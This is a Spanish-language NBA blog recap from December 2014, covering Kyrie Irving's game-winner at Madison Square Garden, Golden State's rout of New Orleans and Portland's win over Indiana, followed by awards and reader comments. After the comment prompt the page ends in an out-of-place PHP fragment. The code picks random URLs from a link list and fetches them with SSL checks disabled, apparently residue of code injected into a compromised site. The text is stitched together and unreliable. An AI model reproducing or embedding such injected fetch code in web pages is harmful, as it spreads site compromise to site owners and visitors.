La crónica: Balones a Kyrie

05 de December de 2014 por FranGuaita

Irving asombra al Madison con 37 puntos y una canasta final de ensueño para certificar el triunfo de Cleveland. En Oakland, el líder del salvaje Oeste se merendó a los Pelicans casi sin bajar del autobús. 11 victorias consecutivas, récord de la franquicia. Además, Portland sigue mandando en la NorthWest tras imponerse a Indiana.

Pasen y lean.

kyrie_msg

KNICKS 87 – CAVALIERS 90

A falta de 18 segundos para la conclusión del partido y con los Cavs uno arriba, Kyrie Irving diseñaba en su cabeza la jugada definitiva. Tenía la oportunidad de firmar el epílogo a una noche mágica en el Madison, la meca del basket. Décimas antes de iniciar la acción ofensiva, David Blatt pidió tiempo muerto. La decisión de su entrenador no agradó a Irving, que regresó al banquillo renegando en arameo. Intuyendo acertadamente que el último balón debía ser para el jugador que había liderado a Cleveland toda la madrugada, Blatt pintó un sistema para Kyrie. El jugón hizo el resto. Crossover de manual para obviar la defensa de Shumpert y bombita a tabla con la izquierda ante la aparición en busca del gorro de Stoudemire. Canastón. 37 puntos y el reconocimiento del elegido. LeBron se plantó ante Irving para, a golpe de pecho, premiar su excelencia. Tampoco estuvo mal James, anoche metido en el rol de facilitador: 19 puntos, 5 rebotes y 12 asistencias. Todas las alertas encendidas en la Gran Manzana. Sólo Philadelphia y Detroit tienen registros peores que NY en el Este. Conociendo a Phil Jackson, no habrá decisiones precipitadas ni titulares grandilocuentes. Pero seguro que no entraba en sus planes un 4-16 para iniciar la regular season.

WARRIORS 112 – PELICANS 85

El primer cuarto de New Orleans -y en concreto de Anthony Davis- hacía pensar en un desenlace mucho más igualado del partido que sirvió para cerrar la jornada del jueves. Gracias a los 11 puntos y 4 rebotes del hombre de la ceja, los Pelicans cerraban el parcial inicial seis arriba (22-28). Tras esos doce minutos de sesteo, Golden State se dejó de contemplaciones. Apretó detrás, cerrando las líneas de pase interior a Davis… y empezaron a llegar las rápidas transiciones de la factoría Curry. Tiros librados de Klay Thompson, balones interiores para Green y Barnes y, muy importante, la aparición de la segunda unidad liderada por Marreese Speights. El resultado del segundo cuarto lo dice todo: 31-12. Ya no hubo partido. Steve Kerr se dedicó a dosificar esfuerzos pensando en lo que está por venir. Mañana sábado, sin ir más lejos, un desafío para el líder de la Western: el United Center de Chicago.

BLAZERS 88 – PACERS 82

En partidos de especial exigencia como el de anoche ante Indiana, nada mejor que poder recurrir a una fórmula de absoluta fiabilidad. Pocas sociedades en la NBA generan más beneficios que el one-two punch que forman Lillard y Aldridge. En una batalla claramente dominada por las defensas, ambos se combinaron para 41 puntos ante los que Pacers nunca tuvo respuesta. Con la victoria conseguida, Portland sigue en la zona noble del salvaje Oeste. El sábado inicia un gira de cinco partidos en NY, Detroit, Minnesota, Indiana y Chicago. Si pasan la prueba con nota alta, mucha atención a estos Blazers.

PREMIOS

MVP: No hay una pasarela mejor para lucirse que el MSG. Lo hizo Kyrie Irving, que tiene especial predilección por la pista de los Knicks, y anoche lo probó con 37 puntos en una serie fantástica de 12 de 18 en tiros de campo y 10 de 11 en libres además de la canasta decisiva que aseguró la trabajada victoria de los Cavs en NY.

Rookie: Poquísima actividad en el frente de los novatos anoche, con lo que el premio queda desierto.

Sorpresa: No es su primer buen partido este año, pero los 15 puntos, 8 rebotes, 3 asistencias, 1 robo y 1 tapón de Solomon Hill tuvieron mucha culpa de que los Pacers plantaran cara en Portland hasta el final.

Decepción: El duelo LeBron vs Melo se lo llevó el de Ohio más por incomparecencia del rival que por méritos propios. Anthony se quedó en 9 puntos y falló 15 de sus 19 lanzamientos en una de las peores actuaciones que se le recuerdan.

Mayor esfuerzo en vano: Cada vez que los Pelicans pierdan, aquí encontrará refugio Anthony Davis. Sus estadísticas de videojuego -30 puntos (14/19 tiros), 15 rebotes, 3 asistencias, 3 tapones y 2 robos- ni siquiera valieron para mantener en el partido a su equipo ante la avalancha ofensiva de los Warriors.

Top 5

Imágenes | AP Photos / Getty Images

Comenta

4 comentarios a esta entrada

  1. rumbero dice:
    #1

    Los Warriors, ese equipo capaz de tirar casi mejor de 3 que los tiros libres. Ayer 10/22 3P (45.5%) y 8-17 TL (47.1%). De locos

      Citar

  2. Luis Hernández dice:
    #2

    Cómo están jugando. Si la segunda unidad funciona bien, Bogut está sano y vuelve Lee, tremendo lo que puede ser ese equipo.

      Citar

  3. Denise dice:
    #3

    Gran crónica para los que llevamos un tiempo despegados de la NBA, solo una cosa, Allen Crabbe no es rookie. En un par de partidos que ví de los Blazers el año pasado, jugaba minutos de la basura por delante, sí, de Victor Claver. Ademas, es un chaval facil de reconocer, porque casi no tiene orejas….xD

      Citar

  4. Azabel dice:
    #4

    anoche volvi a ver a los Cavs y ya son varios seguidos que veo de ellos, y la verdad cada vez me disgustan mas, ayer el banco aportop 10 puntos, Thompson confirma que no es tanto como se esperaba y lo de Waiters comienza a ser preocupante enserio, obviamente que ya no le queda mas nada q ellos dos a la banca de los Cavs y Miller y Harris no aportaron nada de nada

    ahora, si siendo tan dependientes de sus tres grandes (juegan todas las noches mas de 40 minutos) y no sirven para nada como equipo, y estan 10-7, con un par de cambios en el roster y un poco de ayuda de alguien que no sea vareajo, estariamos en presencia de un verdadero candidato

    Por lo poco y lo mal que esta jugnado Waiters, no seria descabellado buscarle un trade, los Cavs necesitan alguien en la banca capaz que tomar la bola y hacer algo por su cuenta cuando no estan las estrellas, el regreso de Jack le vendria de perlas a ese banquillo, o alguna metralleta como Thorton, pero lo q es seguro que asi no puede seguir

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>